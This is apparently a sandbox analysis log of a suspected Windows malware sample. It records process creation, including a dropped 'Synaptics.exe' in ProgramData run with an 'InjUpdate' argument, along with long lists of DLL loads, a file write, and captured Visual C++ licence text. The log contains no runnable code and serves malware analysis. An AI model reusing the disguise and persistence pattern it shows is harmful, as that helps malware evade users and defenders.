                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /pJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /pJump to behavior
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: clusapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: version.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: setupengine.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msi.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: sqmapi.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: setupui.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml6.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: slc.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: mfc42u.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: winmm.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: urlmon.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: xmllite.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: msxml3.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: msftedit.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: uiribbon.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: netprofm.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: npmproxy.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: textshaping.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.globalization.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: bcp47langs.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: bcp47mrm.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: globinputhost.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dataexchange.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: d3d11.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dcomp.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dxgi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: textinputframework.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: coreuicomponents.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: coremessaging.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: ntmarta.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: coremessaging.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: wintypes.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: wintypes.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: wintypes.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: oleacc.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: atlthunk.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dwmapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windowscodecs.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: fms.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: edputil.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dui70.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: duser.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: explorerframe.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: thumbcache.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: assignedaccessruntime.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: linkinfo.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: structuredquery.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.storage.search.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: samcli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: samlib.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: twinapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: networkexplorer.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: ntshrui.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: cscapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: mfc42u.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: winmm.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: urlmon.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: xmllite.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: msxml3.dll
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\dU7ZdIR.iniJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeWindow found: window name: SysTabControl32Jump to behavior
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeWindow detected: MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIESThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any MicrosoftupdatessupplementsInternet-based services and support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1.INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2.Scope of License. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may notdisclose the results of any benchmark tests of the software to any third party without Microsofts prior written approval;work around any technical limitations in the software;reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;publish the software for others to copy;rent lease or lend the software;transfer the software or this agreement to any third party; oruse the software for commercial software hosting services.3.BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4.DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5.Export Restrictions. The software is subject to United States export laws and regulations. 